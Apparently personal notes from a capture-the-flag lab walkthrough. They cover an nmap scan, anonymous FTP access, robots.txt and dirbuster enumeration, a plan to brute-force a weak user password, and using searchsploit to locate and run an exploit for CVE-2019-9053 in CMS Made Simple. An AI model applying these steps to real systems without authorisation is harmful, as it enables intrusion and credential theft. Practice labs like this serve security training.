Scan first 1,000 ports: nmap -T4 -A <ip>
We have ftp, http, and ssh
We have anonymous access to access ftp, so we can enter the command ftp <ip> and then at the prompt anonymous
Once inside, type the keyword passive to disable passive mode and successfully navigate through the files in the ftp server.
catting the file in local machine, we know that the system password is very weak and we can try to brute force that. We also know there is likely a user on the system called mitch
We know he used the same password on some application on the system.
looking on the http server, there is some information we can find on the robots.txt file
mike might be another user on the system, /openemr might be useful, and we know there is a CUPS server, which stands for Common UNIX printing system, but none of those ports were open so we can discount it
Trying to get information about the directory, we can see that there’s nothing here really for us to use
Using dirbuster & we can find a directory called simple. Navigating to that, we find
at the bottom of the page, to which we can find the CVE of CVE-2019-9053 by searching for an exploit of CMS Made Simple, which gives us an SQL Injection we can use
We can use searchsploit to look for the exploit for the version
searchsploit "CMS Made Simple"
run the corresponding python file matching searchsploit’s findings